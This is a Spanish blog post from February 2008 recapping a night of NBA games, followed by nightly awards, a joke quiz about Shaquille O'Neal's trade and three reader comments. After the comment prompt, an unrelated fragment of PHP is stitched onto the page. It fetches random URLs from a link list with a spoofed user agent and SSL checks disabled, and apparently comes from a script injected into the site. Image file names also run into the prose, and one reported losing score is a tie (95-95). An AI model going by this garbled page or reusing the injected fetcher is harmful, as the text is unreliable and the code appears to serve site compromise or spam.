La crónica (06/02/08)

07 de February de 2008 por telekoman

La noche de ayer deparó 11 partidos en los que vimos a Gasol perder por primera vez con la camiseta de los Lakers y donde el resto de favoritos ganaron sus compromisos. Especialmente interesantes fueron los duelos entre Jazz y Nuggets por el primer puesto de la NothWest y entre Hornets y Suns por el primer puesto del Oeste.

pejathreesunshornets

Resumimos los mejor de la noche.

paualhorfordatlantaEn el primer partido de la noche, los Spurs se deshicieron de los Wizards en la capital por 85-77 con algunos apuros y gracias a un invitado inesperado (hasta que lleguen los Playoffs). Robert Horry anotó sus 9 puntos en los últimos 4 minutos del partido para terminar de darle la vuelta a un marcador que se había puesto cuesta arriba para los de San Antonio durante el segundo y tercer cuartos. Escasa aportación ofensiva en el equipo tejano que, salvo los 23 puntos de Duncan, vio como sólo Oberto llegaba a los 10 puntos. El equipo sigue echando en falta a Tony Parker pero va ganando sus partidos. Los Wizards, sin Butler de nuevo, cayeron pese a la buena actuación de Jamison con 18 puntos y a los 15 rebotes de Blatche.

De nuevo el meñique de Kobe Bryant marcó el devenir del partido de los Lakers. En esta ocasión, los Hawks sí consiguieron parar a Fischer y a Gasol y, liderados por un gran Joe Johnson con 28 puntos, se llevaron el partido por un apretado 95-95. Al Horford pudo con Gasol y Odom consiguiendo la nada despreciable cifra de 20 rebotes, 7 de ellos en ataque. Ni Kobe, con 11 puntos y 10 asistencias (y una inoportuna pérdida de balón en los últimos instantes), ni Gasol, con 12 puntos y 7 rebotes, estuvieron a la altura. Tan sólo Odom, con 19 puntos y 11 rebotes, hizo algo de daño. Falta defensa en el equipo angelino, que aún debe terminar de acoplar a Gasol en los esquemas y que empieza a acusar la fatiga de la larga gira en la que se halla inmerso.

Los Nets sólo pudieron hacer frente a los Magic durante el primer cuarto. A partir de ahí el partido se convirtió en un paseo militar capitaneado por Dwight Howard, Turkoglu y Lewis. El pívot de Orlando firmó un buen partido con 21 puntos y 13 rebotes, mientras que sus segundos anotaron ambos 19 puntos. Por los de New Jersey, sólo Carter estuvo combativo anotando 18 puntos mientras que Kidd, de nuevo con la mente lejos de la cancha, anotó 13 puntos a los que añadió 6 rebotes y 7 asistencias. El marcador final, 84-100, es fiel reflejo de lo visto sobre el campo.

En Boston la afición verde volvió a darse cuenta de que tienen un buen equipo más allá del Big Three. De nuevo Rajon Rondo demostró que puede ser el base de los Celtics por muchos años y ejerció de protagonista de un partido que acabó 100-111. rondocassellcelticsclippersCon Garnett fuera por lesión y Pierce recuperándose de una gripe, Rondo tomó la responsabilidad anotadora con 24 puntos y 8 asistencias, ayudado por Ray Allen que consiguió 19. En los Clippers, Maggette volvió a hacer un gran partido con 33 puntos y siendo una pesadilla constante para la defensa rival, pero estuvo poco ayudado ya que ni Kaman, ni Cassell ni Thornton estuvieron en los números que acostumbran.

En el Madison Square Garden los Pacers han conseguido terminar con su racha de 7 derrotas consecutivas gracias a unos Knicks que no están para muchos trotes. Los de New York estuvieron por delante durante gran parte del partido, ganando claramente en el rebote, hasta que los Pacers mejoraron en defensa durante el último cuarto, dejando el marcador en un apretado 103-100. Dentro del trabajo en equipo de los de Indiana destacó algo Kareem Rush con 24 puntos, mientras que por los Knicks Randolph hizo 26 puntos y Crawford 21.

Primer partido de Miami sin la presencia de O’Neal, traspasado a los Suns, y primera derrota, en esta ocación por 95-100. Los Heat, todavía sin Marion ni Banks, no pudieron hacer mucho frente a unos Pistons que, con Rasheed Wallace como figura, camparon a sus anchas por la zona rival. Wallace, con 26 puntos y 10 rebotes, y McDyess, con 13 capturas, fueron una pesadilla constante y estuvieron bien acompañados por Hamilton con 19 puntos y Billups con 15 puntos y 10 asistencias. Wade, que pasa a ser la estrella en solitario del equipo de Florida, sí hizo esta vez un buen partido con 30 puntos y 12 asistencias, aunque sus porcentajes de tiro fueron bastante malos.

En Dallas, el primer triple doble de la carrera de Nowitzki (29 puntos, 10 rebotes y 12 asistencias) junto a los 23 puntos de Jason Terry, fueron más que suficiente para ganar comodamente por 96-107 a unos Bucks arrasados por las bajas. Tan sólo 8 jugadores utilizaron los de Milwaukee, que no pudieron contar con Redd, Yi ni Simmons y que tuvieron a Mo Williams como mejor hombre con 36 puntos, pero unos pésimos porcentajes de tiro, acompañado de Bogut con 24 puntos y 14 rebotes.

Los Jazz consiguieron sobreponerse al pésimo partido de Carlos Boozer gracias a la buena actuación de Deron Williams, 29 puntos y 11 asistencias, y a la aportación de Kyle Korver que anotó 27 puntos, 4 de ellos en los últimos segundos para dejar el marcador en 118-115. La aportación de Korver está siendo importante para unos Jazz que desde el transpaso del jugador han ganado 16 de los 18 partidos disputados, incluyendo los 10 últimos. En esta ocación Denver, principal rival de la división NorthWest, puso las cosas muy complicadas a los Jazz con un Iverson que anotó 32 puntos en una pésima serie de 9 de 27 intentos, y con Carmelo Anthony anotando otros 29 puntos.

Intenso partido por la supremacía en el Oeste el disputado en Phoenix entre los Suns, sin Marion, y los Hornets que se ha resuelto en la segunda prórroga por 132-130 gracias a un tiro de Stojakovic sobre la bocina. El protagonista principal ha sido Chris Paul, que ha tenido una actuación memorable con 42 puntos, 9 asistencias, 5 rebotes y 8 robos de balón. Junto a Paul, Stojakovic ha anotado 26 puntos, incluyendo el tiro ganador, West, 21 y 13 rebotes, y Pargo 22. Los Suns, que horas antes habían transpasado a Marion y Banks a los Heat a cambio de O’Neal, no echaron en falta al tercer diente de su tridente clásico. Boris Diaw anotó 22 puntos en su mejor actuación esta temporada, mientras que Stoudemire consiguió 26 puntos y 20 rebotes.earlwatsonkingstripledouble Nash por su parte fue el máximo anotador de su equipo al conseguir 32 puntos y 12 asistencias, pero su actuación se vio empañada por las 10 pérdidas que cometió. Con esta victoria los Hornets tienen un balance de 3-0 frente a los Suns y el siguiente partido es en New Orleans.

Seguramente los aficionados de los Kings no pensaron que el partido disputado en Sacramento entre su equipo y los Sonics fuera a desarrollarse como lo hizo. El pésimo partido de Kevin Martin con tan sólo 5 puntos en una serie horrible de 1 de 10, la ausencia de Brad Miller y la actuación mediocre de Bibby dejaron a Ron Artest como único anotador válido de los Kings. Artest, también con una serie bastante mala, anotó 20 puntos. Por los Sonics destacó el triple doble de Earl Watson con 23 puntos, 10 rebotes y 10 asistencias y los 17 puntos de Durant. Sin duda la victoria más fácil para Seattle a domicilio por un cómodo 105-92.

En el último partido de la noche, Portland luchaba por no descolgarse en la carrera por el título de la división NorthWest frente a unos Bulls que a las bajas de Deng y Gordon unieron la de Hinrich. Su sustituto, Sefolosha, realizó un gran partido con 22 puntos, los mismo que Nocioni, pero no fue suficiente para parar a unos Trail Blazers comandados por Roy, 28 puntos y 6 asistencias, Aldridge con 18 puntos y Jack con 17, que se hicieron con el partido por 97-100 pese al intento final de los Bulls de remontar.

Vamos ahora con los premios de la noche.cp3suns

Nuestro MVP: Primero iba a ser Josh Smith con sus 17 puntos, 9 rebotes, 9 asistencias y 5 tapones. Después Dirk Nowitzki con su triple doble (29-10-12) pero en cuanto hemos visto la actuación de Chris Paul no han habido dudas: 42 puntos, 9 asistencias, 5 rebotes, 18 de 33 en tiros y… ¡¡8 robos!! ¡Grande CP3!

El rookie: Hoy no hay ningún tipo de discusión. 15 puntos y 20 rebotes son unos números increíbles los haga quien los haga, pero que alcanzan otra dimensión cuando el protagonista es un rookie. Habrá que vigilar de cerca a Al Horford en el futuro.

La sorpresa: Unos demuestran que con minutos pueden ser importantes como Villanueva, Blatche y Sefolosha, otros confirman su mejoría y luchan por no ser considerados sorpresas como Rajon Rondo, y luego están los que tienen el día bueno, como hoy ha pasado con Kyle Korver y Earl Watson. 27 puntos para el surfero y sorprendente triple doble para el jugador de Seattle.

La decepción: Horrible partido de Kevin Martin con 1 de 10 en tiros de campo que ha provocado la derrota de los Kings frente a los Sonics. Malo también el de Richard Jefferson contagiado por el mal juego de los Nets y desastroso el de Carlos Boozer con 3 de 15 en tiros y 8 puntos en total.

Pasatiempos: ¿Cuáles fueron las primeras palabras de Shaquille O’Neal como nuevo jugador de los Suns”

A) “Del último del Este al primero del Oeste… ¿En qué estaría pensando Marion para pedir el traspaso?”
B) “20 millones por cada una de las 3 próximas temporadas… ¿En qué estaría pensando Kerr para hacer este traspaso?”
C) “¡¡Por dios!! Me canso sólo con ver jugar a esta gente”
D) “¿¿Dónde demonios guardáis los donuts aquí??”
E) “Yo aviso: un añito en Phoenix y me piro a los Knicks con Eddy & Zach”

Respuesta correcta: la B… es lo que pensamos nosotros al conocer la noticia. Seguro que Shaq diría algo sobre The Big Fella, Aristóteles, Superman, y preguntaría por el McDonald’s más cercano. El regalo se lo lleva O’Neal, que ha salido del pozo que son los Heat ahora mismo para luchar por el anillo junto a Nash y Amare.

Comenta

3 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    He visto el final del Lakers-Hawks y L.A. ha hecho todo lo posible para perder ese partido. Eso sí, el cansancio era evidente y la verdad es que lógico. Fish y Odom fallan un tiro libre cada uno en los últimos 2 minutos y Kobe pierde absurdamente su único balón del partido en la posesión que podría haber forzado la prórroga. Y luego, 3 abajo, el amigo Vujacic amaga el triple y anota una bandeja a 5 segundos para el final, bastante surrealista.

    En fin, paciencia.

    Qué animalico, Chris Paul ¿no?

      Citar

  2. RusticoColorao dice:
    #2

    Yo también estuve viendo a los angelinos. Para mi la clave viene antes…con la segunda unidad mantienes el partido a 6-8 puntos…y en cuanto entran los titulares el partido se iguala, incomprensible. Pau y Kobe bastante fallones por cierto.

    En cuanto a lo demás…Paul, Dirk, Deron, Josh Smith…son unos animales todos…menos en Chicago, que vamos en caida libre. Agarraoooooooooooooooooossssssssssssssssss

      Citar

  3. Viva_Dirk dice:
    #3

    Partidazo en Hornets-Suns, con triplazos de Barbosa y Nash para forzar las prórrogas, Pargo sin temblarle el pulso y Stojakovic haciendo lo nunca visto en el.

    Mención aparte el partidazo de Paul.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>